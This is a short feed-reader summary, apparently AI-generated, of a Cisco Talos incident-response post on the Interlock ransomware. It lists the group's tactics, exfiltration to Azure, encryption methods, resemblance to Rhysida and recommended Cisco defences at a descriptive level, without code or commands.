Source URL: https://blog.talosintelligence.com/emerging-interlock-ransomware/
Source: Cisco Talos Blog
Title: Unwrapping the emerging Interlock ransomware attack
Feedly Summary: Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and double extortion attacks using the relatively new Interlock ransomware.
AI Summary and Description: Yes
Summary: The analysis by Cisco Talos Incident Response provides an in-depth overview of the Interlock ransomware, detailing its methodologies, delivery mechanisms, and operational tactics. It showcases the complexities of modern ransomware attacks, including big-game hunting and double extortion, highlighting new tactics that may pose risks across various sectors, particularly in the cloud and infrastructure environments.
Detailed Description: Cisco Talos Incident Response has identified and analyzed a new player in the ransomware landscape known as Interlock. This report outlines the attack flow, tools, and techniques used by the attackers, drawing attention to security concerns that can affect cloud computing and infrastructure.
Key Points of Analysis:
* **Overview of Ransomware**:
– Interlock ransomware engages in big-game hunting and double extortion tactics; it targets a broad range of organizations in sectors such as healthcare, government, and technology.
* **Delivery Mechanism**:
– Utilizes a Remote Access Tool (RAT) disguised as a fake browser updater.
– Employs techniques such as PowerShell scripts, credential stealers, and keyloggers to maintain access and gather information.
* **Lateral Movement**:
– Predominantly uses Remote Desktop Protocol (RDP) for lateral movement, alongside tools like AnyDesk and PuTTY.
– Exfiltrates data using Azure Storage Explorer and AzCopy, raising concerns for cloud security.
* **Duration in Environment**:
– The attackers have a detection dwelling time of approximately 17 days within the compromised networks before deploying the ransomware.
* **Operational Tactics**:
– Gained initial access through social engineering (fake software download).
– Established persistence by creating startup items that launch the RAT when users log in.
* **Defense Evasion**:
– Observed disabling of Endpoint Detection and Response (EDR) solutions, hinting at sophisticated evasion techniques.
* **Exfiltration and Impact**:
– Data is exfiltrated to an Azure storage blob, combined with threats to leak sensitive information if ransom demands are not met.
* **Ransomware Features**:
– Both Windows and Linux variants of the Interlock ransomware have been identified.
– Encryption techniques involve advanced methods such as Cipher Block Chaining (CBC) and RSA.
* **Comparison with Other Ransomware**:
– Similarities between Interlock and Rhysida ransomware indicate possible affiliations or code overlaps, suggesting a trend towards cooperation among ransomware groups.
* **Cisco Security Solutions**:
– Talos recommends Cisco products like Secure Endpoint, Secure Email, and Umbrella to defend against these attacks, emphasizing integrated security approaches.
This comprehensive analysis provides critical insights into the evolving ransomware threat landscape, underlining the necessity for robust security strategies, especially for organizations utilizing cloud-based infrastructures. Security professionals should prioritize understanding these threat vectors to enhance their defenses against future ransomware campaigns.